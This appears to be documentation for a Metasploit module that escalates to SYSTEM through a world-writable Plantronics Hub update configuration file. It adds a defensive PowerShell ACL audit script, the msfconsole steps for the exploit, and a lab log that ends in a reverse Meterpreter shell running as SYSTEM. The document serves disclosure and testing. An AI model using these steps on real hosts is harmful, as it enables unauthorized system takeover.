Description
The Plantronics Hub client application for Windows uses an
automatic update service, SpokesUpdateService.exe, which automatically
executes a file specified in the MajorUpgrade.config configuration
file as SYSTEM. The configuration file is writable by all users by default,
so any local user can have a file of their choosing executed as SYSTEM.
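To audit a host for the weak permission described above, the following PowerShell lists ACEs that grant write-type access on the configuration file to broad, non-administrative principals. It is an added example, not part of the module; the function name `Get-BroadWriteAce` is hypothetical, and the default path is the one shown in the Scenarios output on this page.

```powershell
# Added example (not part of the Metasploit module). Function name is hypothetical.
function Get-BroadWriteAce {
    param(
        # Default path is the one shown in the module output on this page.
        [string[]]$Path = 'C:\ProgramData\Plantronics\Spokes3G\MajorUpgrade.config'
    )

    # Well-known SIDs for broad, non-administrative principals (locale independent).
    $broadSids = @{
        'S-1-1-0'      = 'Everyone'
        'S-1-5-11'     = 'Authenticated Users'
        'S-1-5-32-545' = 'BUILTIN\Users'
        'S-1-5-4'      = 'INTERACTIVE'
    }

    # Rights that let a principal change the file's content or its ACL.
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    # GENERIC_WRITE and GENERIC_ALL can appear unmapped in some ACEs.
    $writeMask = $writeMask -bor 0x40000000 -bor 0x10000000

    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) {
            Write-Warning "Not found: $p"
            continue
        }
        $acl = Get-Acl -LiteralPath $p
        # Ask for SIDs instead of names so matching does not depend on the OS language.
        $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($rule in $rules) {
            $sid = $rule.IdentityReference.Value
            if ($rule.AccessControlType -eq 'Allow' -and
                $broadSids.ContainsKey($sid) -and
                (([int]$rule.FileSystemRights) -band $writeMask) -ne 0) {
                [pscustomobject]@{
                    Path      = $p
                    Principal = $broadSids[$sid]
                    Rights    = $rule.FileSystemRights
                    Inherited = $rule.IsInherited
                }
            }
        }
    }
}

Get-BroadWriteAce | Format-Table -AutoSize
```

Any row returned means a non-administrative principal can alter the file that the SYSTEM update service reads; an empty result means no such ACE was found for the listed principals.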
Vulnerable Application
This module has been tested successfully on Plantronics Hub version 3.13.2 on Windows 7 SP1 (x64).
Verification Steps
- Start msfconsole
- Get a session
- use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
- set SESSION <SESSION>
- check
- run
- You should get a new SYSTEM session
Options
SESSION
Which session to use, which can be viewed with sessions
WritableDir
A writable directory file system path. (default: %TEMP%)
Scenarios
Windows 7 SP1 (x64)
msf5 > use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set verbose true
verbose => true
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check
[*] The service is running, but could not be validated.
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Writing payload to C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe ...
[*] Writing configuration file to C:\ProgramData\Plantronics\Spokes3G\MajorUpgrade.config ...
[*] Sending stage (180291 bytes) to 172.16.191.242
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49431) at 2020-01-03 14:55:46 -0500
[-] Failed to delete C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >